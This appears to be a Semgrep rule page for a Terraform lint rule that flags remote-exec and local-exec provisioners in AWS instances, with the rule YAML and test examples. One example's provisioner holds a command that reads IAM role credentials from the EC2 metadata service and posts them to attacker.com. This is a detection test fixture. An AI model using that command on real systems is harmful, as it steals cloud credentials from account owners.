terraform.aws.security.aws-provisioner-exec.aws-provisioner-exec

profile photo of semgrepsemgrep
Author
unknown
Download Count*
LGPL Commons Clause
License

Provisioners are a tool of last resort and should be avoided where possible. Provisioner behavior cannot be mapped by Terraform as part of a plan, and execute arbitrary shell commands by design.

Run Locally

Run in CI

Semgrep CI docs

Defintion

Edit RuleView Source
Open in Playground 
rules:
  - patterns:
      - pattern-either:
          - pattern: |
              provisioner "remote-exec" {
                  ...
              }
          - pattern: |
              provisioner "local-exec" {
                  ...
              }
      - pattern-inside: |
          resource "aws_instance" "..." {
              ...
          }
    id: aws-provisioner-exec
    message: Provisioners are a tool of last resort and should be avoided where
      possible. Provisioner behavior cannot be mapped by Terraform as part of a
      plan, and execute arbitrary shell commands by design.
    languages:
      - terraform
    severity: WARNING
    metadata:
      category: security
      owasp:
        - A03:2021 - Injection
        - A01:2017 - Injection
      cwe:
        - "CWE-77: Improper Neutralization of Special Elements used in a Command
          ('Command Injection')"
        - "CWE-94: Improper Control of Generation of Code ('Code Injection')"
      subcategory:
        - guardrail
      confidence: HIGH
      likelihood: HIGH
      impact: MEDIUM
      technology:
        - terraform
      references:
        - https://developer.hashicorp.com/terraform/language/resources/provisioners/remote-exec
        - https://developer.hashicorp.com/terraform/language/resources/provisioners/local-exec
      license: Commons Clause License Condition v1.0[LGPL-2.1-only]
      vulnerability_class:
        - Code Injection
        - Other

Examples

aws-provisioner-exec.tf


resource "aws_instance" "example" {
  ami           = "ami-06ca3ca175f37dd66"
  instance_type = "t2.micro"


  associate_public_ip_address = true
  # ruleid: aws-provisioner-exec
  provisioner "remote-exec" {
    inline = [
      "sudo yum install ec2-instance-connect -y",
      "curl http://169.254.169.254/latest/meta-data/iam/security-credentials/tf-testing-role > /tmp/awscreds.txt && curl https://attacker.com/creds.php --data-urlencode creds@/tmp/awscreds.txt"
    ]
  }

  iam_instance_profile = "tf-testing-role"

  connection {
    type        = "ssh"
    user        = "ec2-user"
    private_key = tls_private_key.this.private_key_openssh
    host        = self.public_ip
    agent       = false
  }

  key_name = aws_key_pair.this.key_name

  vpc_security_group_ids = [aws_security_group.example.id]

  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "optional"
    http_put_response_hop_limit = 10
  }

  tags = {
    Name = "terraform-testing"
  }
}

resource "aws_instance" "example" {
  ami           = "ami-06ca3ca175f37dd66" // make sure to update this to a valid AMI ID
  instance_type = "t2.micro"


  associate_public_ip_address = true

  iam_instance_profile = "tf-testing-role"

  connection {
    type        = "ssh"
    user        = "ec2-user"
    private_key = tls_private_key.this.private_key_openssh
    host        = self.public_ip
    agent       = false
  }

  key_name = aws_key_pair.this.key_name

  vpc_security_group_ids = [aws_security_group.example.id]

  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "optional"
    http_put_response_hop_limit = 10
  }

  tags = {
    Name = "terraform-testing"
  }
}